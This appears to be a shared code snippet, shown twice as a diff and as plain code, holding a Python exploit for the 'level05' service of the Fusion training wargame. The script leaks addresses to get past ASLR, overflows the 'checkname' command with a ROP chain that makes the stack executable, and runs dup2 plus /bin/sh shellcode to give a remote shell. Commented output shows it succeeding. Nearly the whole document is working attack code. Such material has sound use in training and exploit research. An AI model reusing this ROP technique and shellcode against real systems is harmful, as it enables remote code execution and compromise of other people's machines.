soez · December 7, 2014 21:55
diff --git a/2fusion-level05.py b/2fusion-level05.py
 # -*- encoding: utf-8 -*-
 from amnesia import *
 from struct import pack, unpack
 import time, sys

 ##################################################################################
 # Exploit configuration parameters.. Must be adjusted to the target system and app.
 OFFSET_SAVED_EIP = 0xb7ffc848
 PAGE_NUMBER_OF_NEXT_INSTRUCTION_TO_CALL = 2
 OFFSET_TO_LIBC = 0x1a9000 
 # Ubuntu 11.10
 # Congrats to Hector Marco-Gisbert ∗ & Ismael Ripoll
 # {hecmargi,iripoll}@upv.es // http://cybersecurity.upv.es
 ##################################################################################
 s = amnesiaSocket("192.168.1.11", 20005)
 print s.readLine()
 print "[+] Obteniendo app base.."
 app_base = (OFFSET_SAVED_EIP &~ 0xfff) - (PAGE_NUMBER_OF_NEXT_INSTRUCTION_TO_CALL << 12)
 print "[+] App Base en 0x%08x" % app_base
 base = (int(app_base) - OFFSET_TO_LIBC)
 print "[+] Libc Base en 0x%08x" % base
 shellcode  = "\x6a\x08\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8"	# dup2 by Nox & soez
 shellcode += "\x31\xc0\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" # shellcode by Nox
 shellcode += "\x90" * 16
 print "[+] Envio checkname.."
 s.write("checkname " + "A"*44 	+ pack("<L", base + 0x768e1)  # ret ;;	
 				+ pack("<L", base + 0x1a9e)   # pop edx ;;
 				+ pack("<L", 0xffffffff)      # -0x1
 				+ pack("<L", base + 0x115e77) # inc edx ;;
 				+ pack("<L", base + 0x115e77) # inc edx ;;
 				+ pack("<L", base + 0x115e77) # inc edx ;;
 				+ pack("<L", base + 0x115e77) # inc edx ;;
 				+ pack("<L", base + 0x115e77) # inc edx ;;
 				+ pack("<L", base + 0x115e77) # inc edx ;;
 				+ pack("<L", base + 0x115e77) # inc edx ;;
 				+ pack("<L", base + 0x115e77) # inc edx ;;
 				+ pack("<L", base + 0x238df)  # pop eax ;;
 				+ pack("<L", base + 0x54)     # [0x1000] 
 				+ pack("<L", base + 0x3d527)  # mov ecx [eax+0x3c] ; mov eax [eax+0x40] ;;
 				+ pack("<L", base + 0x18f4e)  # pop ebx ;;
 		 		+ pack("<L", 0xb801bfff)      # &buffer
 				+ pack("<L", base + 0x328e0)  # xor eax eax ;;
 				+ pack("<L", base + 0x7cc70)  # add eax 0x1 ;;
 				+ pack("<L", base + 0x7cc72)  # add ebx eax ; add eax 0x2 ;;
 				+ pack("<L", base + 0x328e0)  # xor eax eax ;;
 				+ pack("<L", base + 0x7cca8)  # add eax 0xf ;;
 				+ pack("<L", base + 0x7cca8)  # add eax 0xf ;;
 				+ pack("<L", base + 0x7cca8)  # add eax 0xf ;;
 				+ pack("<L", base + 0x7cca8)  # add eax 0xf ;;
 				+ pack("<L", base + 0x7cca8)  # add eax 0xf ;;
 				+ pack("<L", base + 0x7cca8)  # add eax 0xf ;;
 				+ pack("<L", base + 0x7cca8)  # add eax 0xf ;;
 				+ pack("<L", base + 0x7cca8)  # add eax 0xf ;;
 				+ pack("<L", base + 0x7cc80)  # add eax 0x5 ;;
 				+ pack("<L", 0xb7fdb0c0)      #	int 0x80 ;;
 				+ pack("<L", base + 0x1458db) # jmp esp ;;
 				+ "\x90"*4 + shellcode)

 time.sleep(0.5)
 s.interactive()

 # from gdb
 # ** welcome to level05 **
 #
 # [+] Obteniendo app base..
 # [+] App Base en 0xb7ffa000
 # [+] Libc Base en 0xb7e51000
 # [+] Envio checkname..
 # id
 # uid=20005 gid=20005 groups=20005
	# -- encoding: utf-8 --
	from amnesia import *
	from struct import pack, unpack
	import time, sys

	##################################################################################
	# Exploit configuration parameters.. Must be adjusted to the target system and app.
	OFFSET_SAVED_EIP = 0xb7ffc848
	PAGE_NUMBER_OF_NEXT_INSTRUCTION_TO_CALL = 2
	OFFSET_TO_LIBC = 0x1a9000
	# Ubuntu 11.10
	# Congrats to Hector Marco-Gisbert ∗ & Ismael Ripoll
	# {hecmargi,iripoll}@upv.es // http://cybersecurity.upv.es
	##################################################################################
	s = amnesiaSocket("192.168.1.11", 20005)
	print s.readLine()
	print "[+] Obteniendo app base.."
	app_base = (OFFSET_SAVED_EIP &~ 0xfff) - (PAGE_NUMBER_OF_NEXT_INSTRUCTION_TO_CALL << 12)
	print "[+] App Base en 0x%08x" % app_base
	base = (int(app_base) - OFFSET_TO_LIBC)
	print "[+] Libc Base en 0x%08x" % base
	shellcode = "\x6a\x08\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8" # dup2 by Nox & soez
	shellcode += "\x31\xc0\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" # shellcode by Nox
	shellcode += "\x90" * 16
	print "[+] Envio checkname.."
	s.write("checkname " + "A"*44 + pack("<L", base + 0x768e1) # ret ;;
	+ pack("<L", base + 0x1a9e) # pop edx ;;
	+ pack("<L", 0xffffffff) # -0x1
	+ pack("<L", base + 0x115e77) # inc edx ;;
	+ pack("<L", base + 0x115e77) # inc edx ;;
	+ pack("<L", base + 0x115e77) # inc edx ;;
	+ pack("<L", base + 0x115e77) # inc edx ;;
	+ pack("<L", base + 0x115e77) # inc edx ;;
	+ pack("<L", base + 0x115e77) # inc edx ;;
	+ pack("<L", base + 0x115e77) # inc edx ;;
	+ pack("<L", base + 0x115e77) # inc edx ;;
	+ pack("<L", base + 0x238df) # pop eax ;;
	+ pack("<L", base + 0x54) # [0x1000]
	+ pack("<L", base + 0x3d527) # mov ecx [eax+0x3c] ; mov eax [eax+0x40] ;;
	+ pack("<L", base + 0x18f4e) # pop ebx ;;
	+ pack("<L", 0xb801bfff) # &buffer
	+ pack("<L", base + 0x328e0) # xor eax eax ;;
	+ pack("<L", base + 0x7cc70) # add eax 0x1 ;;
	+ pack("<L", base + 0x7cc72) # add ebx eax ; add eax 0x2 ;;
	+ pack("<L", base + 0x328e0) # xor eax eax ;;
	+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
	+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
	+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
	+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
	+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
	+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
	+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
	+ pack("<L", base + 0x7cca8) # add eax 0xf ;;
	+ pack("<L", base + 0x7cc80) # add eax 0x5 ;;
	+ pack("<L", 0xb7fdb0c0) # int 0x80 ;;
	+ pack("<L", base + 0x1458db) # jmp esp ;;
	+ "\x90"*4 + shellcode)

	time.sleep(0.5)
	s.interactive()

	# from gdb
	# welcome to level05
	#
	# [+] Obteniendo app base..
	# [+] App Base en 0xb7ffa000
	# [+] Libc Base en 0xb7e51000
	# [+] Envio checkname..
	# id
	# uid=20005 gid=20005 groups=20005